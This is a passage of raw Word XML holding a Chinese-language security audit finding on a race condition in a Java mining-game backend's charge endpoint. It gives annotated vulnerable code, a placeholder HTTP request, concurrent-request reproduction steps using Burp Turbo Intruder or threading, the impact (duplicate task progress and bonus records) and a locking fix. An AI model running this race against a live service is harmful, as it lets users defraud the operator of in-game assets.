        <w:t>矿机充电状态检查（无锁读）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发生在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userPowerRepository.findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（加行锁）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发请求可以同时读取到矿机 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged == 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或充电已过期，均通过"重复充电"拦截，随后都进入后续流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="793"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">电力记录使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 保护，确实序列化了电力扣减——但这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>仅保护了电力余额不双扣至负值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，并不阻止两个事务先后都完成后续的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(userId, "7", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 任务进度双重递增</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveChargeRecord(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 充电记录双重写入（含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>bonusGold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 预估金额）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 双重重算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/api/power/charge</w:t>
              <w:br/>
              <w:t>→ TokenAuthFilter      : 校验 Bearer Token，从 Token 提取 userId 注入 request 属性（安全，无法伪造）</w:t>
              <w:br/>
              <w:t>→ SignAuthTestFilter   : 校验 appKey/appSecret/nonce/timestamp 签名（/api/power/** 在签名范围内）</w:t>
              <w:br/>
              <w:t>→ PowerController.charge()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>→ PowerService.charge()  ← 竞态窗口在此</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入口：PowerController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/charge")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; charge(@CurrentUserId Long userId, @RequestBody ChargeForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // userId 来自 Token（安全），slotId 来自请求体（攻击者可控 Integer）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    powerService.charge(userId, form.getSlotId());  // ← 污点 slotId 传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 业务核心：PowerService.java  charge()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void charge(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (!isPowerUnlocked(userId)) { ... }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 【竞态窗口开始】矿机记录：普通 SELECT，无 FOR UPDATE，无行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("坑位无矿机"));</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 【TOCTOU 检查点】读取 isCharged 时矿机行未加锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //    并发请求 Tx1 / Tx2 可同时读到 isCharged==0（或过期），同时通过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (miner.getIsCharged() != null &amp;&amp; miner.getIsCharged() == 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">            &amp;&amp; miner.getChargedExpireTime() != null &amp;&amp; miner.getChargedExpireTime().isAfter(now)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("该矿机正在充电加速中，不可重复充电");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }                                                                           // ← 两个并发事务均绕过此处</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 电力记录加行锁（SELECT FOR UPDATE）—— 仅序列化了电力扣减，竞态已发生</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserPower power = userPowerRepository.findByUserIdForUpdate(userId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户电力记录不存在"));</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (power.getPowerBalance() == null || power.get</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PowerBalance() &lt; POWER_COST) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("电力不足，暂无法为矿机充电");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    power.setPowerBalance(power.getPowerBalance() - POWER_COST);  // ← Tx1 扣1电力后提交，Tx2 再扣1电力</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userPowerRepository.save(power);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setChargedExpireTime(LocalDateTime.now().plusMinutes(getDurationMinutes()));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);   // ← 两次写入矿机，第二次覆盖第一次（充电时效略有偏差）</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 【高危影响点】任务进度被递增两次；若任务"7"触发奖励，奖励将双重发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(userId, "7", 1);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 充电记录（含 bonusGold 预估）被写入两条</w:t>
              <w:br/>
              <w:t xml:space="preserve">    saveChargeRecord(userId, POWER_COST, 1, List.of(miner));</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    minerService.recalcUserLevelAndHashRate(userId);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 充电记录写入：PowerService.java  saveChargeRecord()</w:t>
              <w:br/>
              <w:t>private void saveChargeRecord(Long userId, int powerConsumed, int minerCount, List&lt;UserMiner&gt; miners) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PowerChargeRecord r = new PowerChargeRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setChargeAt(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setPowerConsumed(powerConsumed);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setMinerCount(minerCount);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← bonusGold 预估值被记录两次；若下游消费此记录发放金币，将双重到账</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setBonusGold(minerService.estimateChargeBonusGold(miners, getDurationMinutes(), getAccelerationRatio()));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    powerChargeRecordRepository.save(r);                           // ← 写入两条充电记录</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同时（并发）发送以下两个相同请求，需在签名有效期内携带合法签名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 参数由 SignAuthTestFilter 校验）：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/api/power/charge HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;已登录用户的合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": &lt;攻击者持有的矿机坑位ID&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 注意：由于 SignAuthTestFilter 启用了 Nonce 唯一性防重放，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两次并发请求必须携带不同的 nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（各自独立签名），nonce 在 Redis 中 5 分钟 TTL 防重放，因此需构造两个独立签名的并发请求而非单纯重放同一签名。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797"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用正常账户登录，获取有效 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，确保账户拥有 ≥ 2 电力余额且目标坑位矿机未在充电状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造两个携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不同 nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的合法签名请求，指向同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="799"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用多线程/并发工具（如 curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Burp Suite Turbo Intruder）在同一时间窗口内并发发送两个请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="800"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="801"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务端数据库中出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerChargeRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>select * from power_charge_record where user_id = ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可见两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>charge_at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时间极近的记录）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="802"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(userId, "7", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用两次，任务"7"进度累计 +2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="803"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若任务"7"为"完成N次充电"类型，单次并发操作即可推进 2 个进度，在任务奖励丰厚时造成游戏内资产超额发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>电力余额消耗 2 点（合规代价为 2 点电力，但若任务奖励价值 &gt; 1 点电力价值，存在净收益）。</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805"/>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806"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通已登录用户，无需任何特殊权限；仅需持有 ≥ 2 电力余额及一个已部署矿机的坑位即可触发。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根本原因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>矿机行锁缺失：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为普通 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），导致充电状态检查与状态写入之间存在非原子窗口。正确做法应为矿机记录也使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或在充电状态写入时使用乐观锁（版本号 / CAS）：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应改为：</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SELECT * FROM user_miner WHERE user_id = ? AND slot_id = ? AND in_storage = 0 FOR UPDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">或在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
